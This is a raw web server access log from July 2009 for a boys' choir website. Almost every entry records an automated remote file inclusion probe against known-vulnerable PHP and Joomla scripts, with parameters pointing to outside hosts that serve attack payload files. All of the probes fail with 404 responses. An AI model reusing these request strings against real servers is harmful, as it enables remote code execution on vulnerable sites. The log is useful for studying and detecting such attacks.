70.85.213.106 - - [04/Jul/2009:10:02:16 -0700] "GET /logs/access_090626.log//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:02:25 -0700] "GET /logs/access_090629.log//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
114.200.199.144 - - [04/Jul/2009:10:02:36 -0700] "GET /errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.30.79.34 - - [04/Jul/2009:10:02:40 -0700] "GET /xxxxxxx/resources/?M=A HTTP/1.0" 200 540 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.americanboyschoir.com"
114.200.199.144 - - [04/Jul/2009:10:03:00 -0700] "GET /logs/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
114.200.199.144 - - [04/Jul/2009:10:03:00 -0700] "GET /logs/access_090626.log%20%20/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:10:04:35 -0700] "GET /logs/access_090626.log/home.php?pagina=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:10:04:35 -0700] "GET /logs/home.php?pagina=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:10:04:35 -0700] "GET /home.php?pagina=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:10:05:07 -0700] "GET /logs/access_090626.log%20%20/home.php?pagina=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:05:18 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:05:19 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:05:21 -0700] "GET /logs/access_090626.log//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:05:42 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:05:42 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:05:47 -0700] "GET /logs/access_090626.log//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:06:19 -0700] "GET /logs/access_090626.log%20//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:10:06:28 -0700] "GET /logs/access_090603.log%20%20/ktmlpro//includes/ktedit/toolbar.php?dirDepth=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:10:06:28 -0700] "GET /ktmlpro//includes/ktedit/toolbar.php?dirDepth=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:10:06:28 -0700] "GET /logs/ktmlpro//includes/ktedit/toolbar.php?dirDepth=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:06:52 -0700] "GET /logs/access_090626.log%20//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:10:07:12 -0700] "GET /ktmlpro//includes/ktedit/toolbar.php?dirDepth=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:10:07:12 -0700] "GET /logs/ktmlpro//includes/ktedit/toolbar.php?dirDepth=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:10:07:12 -0700] "GET /logs/access_090603.log%20%20/ktmlpro//includes/ktedit/toolbar.php?dirDepth=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:10:08:50 -0700] "GET /logs/access_090528.log%20%20/ktmlpro//includes/ktedit/toolbar.php?dirDepth=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:10:09:24 -0700] "GET /logs/access_090528.log%20%20/ktmlpro//includes/ktedit/toolbar.php?dirDepth=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
114.200.199.144 - - [04/Jul/2009:10:09:35 -0700] "GET /logs/access_090629.log/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
114.200.199.144 - - [04/Jul/2009:10:10:03 -0700] "GET /logs/access_090626.log/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:10:10:25 -0700] "GET /logs/access.log/home.php?pagina=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:10:11:32 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:10:11:32 -0700] "GET /logs/access_090414.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:10:11:32 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:10:11:42 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:10:11:42 -0700] "GET /logs/access_090414.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:10:11:42 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:10:11:57 -0700] "GET /logs/access_090528.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:10:12:08 -0700] "GET /logs/access_090528.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
207.58.155.223 - - [04/Jul/2009:10:12:39 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:14:29 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:14:29 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:14:29 -0700] "GET /logs/access_090528.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:14:42 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:14:42 -0700] "GET /logs/access_090528.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:14:44 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.137.160.12 - - [04/Jul/2009:10:14:46 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.137.160.12 - - [04/Jul/2009:10:14:46 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.137.160.12 - - [04/Jul/2009:10:14:46 -0700] "GET /logs/access.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.137.160.12 - - [04/Jul/2009:10:15:02 -0700] "GET /logs/access_090517.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:10:16:48 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:10:16:48 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:10:16:48 -0700] "GET /logs/access.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:10:17:12 -0700] "GET /logs/access_090517.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:17:58 -0700] "GET /logs/access_090626.log//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:17:59 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:17:59 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:18:17 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:18:19 -0700] "GET /logs/access_090626.log//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:18:19 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.137.160.12 - - [04/Jul/2009:10:18:37 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.137.160.12 - - [04/Jul/2009:10:18:37 -0700] "GET /logs/access_090629.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:10:21:00 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:10:21:00 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:10:21:00 -0700] "GET /logs/access_090301.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
147.123.157.1 - - [04/Jul/2009:10:22:33 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
147.123.157.1 - - [04/Jul/2009:10:22:33 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
147.123.157.1 - - [04/Jul/2009:10:22:33 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
147.123.157.1 - - [04/Jul/2009:10:22:33 -0700] "GET /logs/access_090629.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:10:23:38 -0700] "GET /logs/access_090629.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:10:23:38 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:10:23:57 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:10:23:57 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:10:23:57 -0700] "GET /logs/access_090517.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:10:24:02 -0700] "GET /logs/access_090626.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:10:24:10 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:10:24:10 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:10:24:12 -0700] "GET /logs/access_090517.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:10:24:22 -0700] "GET /logs/access_090528.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:10:24:28 -0700] "GET /logs/access_090528.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:25:52 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:25:52 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:25:52 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:25:54 -0700] "GET /logs/access_090629.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:26:03 -0700] "GET /logs/access_090629.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:26:30 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:26:30 -0700] "GET /logs/access.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:26:38 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:27:14 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:27:14 -0700] "GET /logs/access_090629.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:27:14 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:10:27:22 -0700] "GET /logs/access_090629.log/ktmlpro//includes/ktedit/toolbar.php?dirDepth=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:10:27:23 -0700] "GET /logs/access_090629.log/ktmlpro//includes/ktedit/toolbar.php?dirDepth=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:10:27:39 -0700] "GET /logs/access.log/ktmlpro//includes/ktedit/toolbar.php?dirDepth=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:10:27:40 -0700] "GET /logs/access.log/ktmlpro//includes/ktedit/toolbar.php?dirDepth=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:10:27:43 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:10:28:10 -0700] "GET /logs/access_090629.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:10:28:11 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:10:28:12 -0700] "GET /logs/access_090629.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
